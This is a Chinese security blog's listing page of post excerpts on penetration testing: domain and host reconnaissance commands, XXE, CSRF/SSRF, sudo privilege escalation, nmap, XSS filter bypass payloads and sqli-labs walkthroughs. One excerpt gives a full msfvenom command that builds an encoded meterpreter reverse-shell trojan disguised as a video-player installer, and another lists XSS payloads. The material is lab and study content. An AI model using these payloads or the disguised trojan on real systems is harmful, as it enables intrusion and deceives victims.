自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(22)
  • 收藏
  • 关注

原创 绕过CDN查找ip

在渗透网站的时候,你会发现你收集的那个ip不是网站的真实ip,可能使用了cdn加速,cdn加速是一种流量分发技术,为了提高用户访问速度。

2022-02-21 19:32:23 1164

原创 web信息收集

title: 信息收集tags:nullcategories:信息收集nulldate: 2021-03-20 18:40:54keywords:top_img:cover:updated:sticky:description:copyright:信息收集简介在渗透与测试工作中,首先进行的应该就是信息收集,一是全面统计资产,二就是知己知彼方能百战不殆。信息收集的完成度直接关系到我们入侵的成功率,渗透测试中有一门学问叫社会工程学,社工就是和信息收集有关。针对.

2022-02-18 21:40:58 2735

原创 xxe漏洞

title: xxe漏洞date: 2021-05-25 10:37:23xxe漏洞概述XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从安全角度理解成XML External Entity attack 外部实体注入攻击。基础知识拓展xml简介可扩展 标记语言,标准通用标记语言的子集,简称XML。是一种用于标记电子文件使其具有结构性 的标记语言。在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议).

2022-02-16 17:37:51 2771

原创 android学习_1

adb调试工具的一些使用adb connect ip:port #连接指定ip端口的设备adb shell #连接当前唯一已连接设备命令行adb devices #列出所有已连接设备adb -s[设备名] shell #运行指定设备命令行adb -e shell #运行唯一的虚拟设备命令行adb

2021-11-17 21:17:49 1292

原创 内网信息收集-本机信息-下

内网信息收集-下这篇主要讲通过工具的自动化信息收集本机信息收集自动化收集通过WMIC脚本收集WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具) ,是最有用的windows命令工具,在默认情况下,任何版本的window XP 的低权限用户不能访问WMIC,windows7以上的版本允许低权限用户访问WMIC并执行相关操作。WMIC详解WMIC信息收集脚本下载地址,http://www.fuzzysecurity.com/scrip

2021-11-14 19:56:27 320

原创 内网信息收集-域

收集域信息收集域内主机信息情景设想:你现在已经进入内网获得了一个shell.再次基础上进行内网的信息收集。查看当前用户权限whoami获取一台主机后有三种权限,本地普通用户: 这是一台计算机名叫hacker的dell用户本地管理员权限:一般为格式为主机名\administrator域内用户:当前是test域内的administrator用户,在这三种情况中,如果当前内网中存在域,那么本机普通用户只能查询到本机相关信息,而不能查询域内信息,而本地管理员和域内用户可以查询到.

2021-11-14 19:54:33 324

原创 内网域信息收集的一些命令

net view /domain #查询域net view /domain:HACKE #查询域内计算机net group /domain #查询域所有用户列表net group "domain computers" /domain #查询所有域成员计算机列表net accounts /domain #获取域密码信息nltest /domain_trusts #获得域信任信息nlte

2021-10-31 22:29:07 707

原创 内网信息收集-本机信息-上

内网信息收集本机信息收集手动收集收集范围本机信息包括操作系统.权限,内网ip地址段,杀毒软件,端口,服务,补丁更新频率,网络连接,共享,会话。如果是域内主机,操作系统,应用软件,补丁,服务,杀毒软件一般都是批量安装的。查询网络信息ipconfig /all查询操作系统及软件信息:查询操作系统和版本信息systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"英文操作系统就这个c systeminfo | findstr /B

2021-10-17 19:23:58 345

原创 汇编笔记_1

汇编语言-寄存器IA-32位通用寄存器8个32位寄存器EAX, EBX, ECX, EDX,ESI, EDI , EBP, ESP8个16位寄存器AX,BX,CX,DXSI,DI,BP,SP8个8位寄存器AH,BH,CH,DHAL,BL,CL,D、L汇编子程序子程序举例TestProc proc ;名为TestProc的子程序 local @loc1:dword, @loc2

2021-10-14 10:22:12 184

原创 windows域环境搭建-下

windows域环境搭建-下加入域环境接上回,加入域环境失败后,我又找了一个企业版的win7镜像,已经安装好虚拟机,配好ip地址了。重启计算机生效接下来在 DC 上查看新加入的计算机,点击 window键展开 test.local ,点击 Computers ,可以查看到域中新添加了两台计算机,分别是 BOB 和 JOHN加入域后,还需要有域账号才能登录域,我们先创建两个部门,分别是运维部和行政部,在 test.local 上右键-》新建-》组织单元创建两个部门。在运维部

2021-10-12 22:44:03 118

原创 windows域环境搭建上

windows域环境搭建1.准备工作域环境的介绍Windows域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。身份验证在域控制器上进行。在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为“域控制器(Domain Controller,简写为DC)”。W

2021-10-12 21:23:13 2060

原创 linux权限提升漏洞

title: liunx-sudo权限提升漏洞(CVE-2021-3156)复现date: 2021-03-12 20:13:24author: 孤独的上单人updated: 2021-03-16 20:13:24liunx sudo权限提升漏洞(CVE-2021-3156)复现漏洞原理​ 1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在.

2021-10-12 16:46:24 165

原创 csrf-ssrf

title: csrf,ssrf小结date: 2021-03-17 20:17:40csrf,ssrf小结csrf和ssrf的区别csrf概念CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性。你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、.

2021-10-12 16:41:52 1586

原创 google语法

title: google语法categories:信息收集date: 2021-03-19 19:18:33google语法google语法简介Google是一款十分强大的搜索引擎,黑客们常常借助它搜索网站的一些敏感目录和文件,甚至可以利用它的搜索功能来自动攻击那些有漏洞的网站;我们在日常的生活中正确的借助Google搜索也可以更加高效的找到我们需要的东西。基本语法AND | ORsite:可以限制你搜索范围的域名.例如 : site :edu.cninurl:用.

2021-10-12 16:40:16 105

原创 namp工具

title: nmap工具tags:安全工具date: 2021-03-18 16:35:04keywords: nmapnmap工具nmap简介官方介绍: Nmap(“网络映射器”)是免费开放源代码(许可证)实用程序,用于网络发现和安全审核。许多系统和网络管理员还发现它对于诸如网络清单,管理服务升级计划以及监视主机或服务正常运行时间之类的任务很有用。Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务(应用程序名称和版本),它们正在运行的操作系统(和.

2021-10-11 15:19:08 3607

原创 xss过滤绕过方法总结

xss注入常用语句、1.<script>alert(1)</script>2.<img src="#" onmouseover="alert(11)">3.<img src="#" onerror="alert('xss')">4.<svg onload=alert(1)>5.<a href=javascript:alert(1)>1.尝试双写绕过2.大小写绕过、3.js编码#unicode js的一种编码方式。4.h

2020-09-15 18:04:03 10971

原创 msf_木马

使用kali虚拟机生成木马使win7虚拟机中毒,并控制kali虚拟机1.制作木马打开kali虚拟机msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -b " x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/ 西瓜影音 .exe使用msfvenom生成木马,在渗透过程中,MSF漏洞利用

2020-05-13 16:25:30 2352

原创 漏洞之越权

如果使用A用户的权限去操作B用户的数据,A的权限小于B的权限,如果能够成功操作,则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,当用户对权限页面内的信息进行这些操作时,后台需要对 对当前用户的权限进行校验,看其是否具备操作的权限,从而给出响应,而如果校验的规则过于简单则容易出现越权漏洞。因此...

2020-03-23 12:24:38 1075

原创 sqli-labs 41-65关

sql-labs 41-65关

2020-02-08 17:09:27 436

原创 sqli-labs 21-40关

##21关进行基本尝试发现用户名与密码都被过滤,那么先登陆试试吧!登陆之后页面变为发现注入点可能为ip,cookie,agent,使用抓包软件试试。看这个东西显然被加密了。...

2020-02-01 23:35:34 620 1

原创 sql-labs11-20关

11-20关都为post传递,这里我们可以用burrp_suit来进行抓包和改包,也可以用hackbar来进行注入。##11关单引号闭合的联合注入1.先使用1' or 1=1#来找到他的闭合方式。登录成功单引号闭合。2.-1' order by 3# 找有多少个字段。报错,换成2不报错说明有两个字段。3.你就可以愉快的使用联合注入了!我只把语句写一下,具体详情请见我另一篇博客。(...

2020-01-13 22:28:08 759

原创 sql-labs注入1-10关

sql-labs1-20关

2020-01-13 19:21:10 1108

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除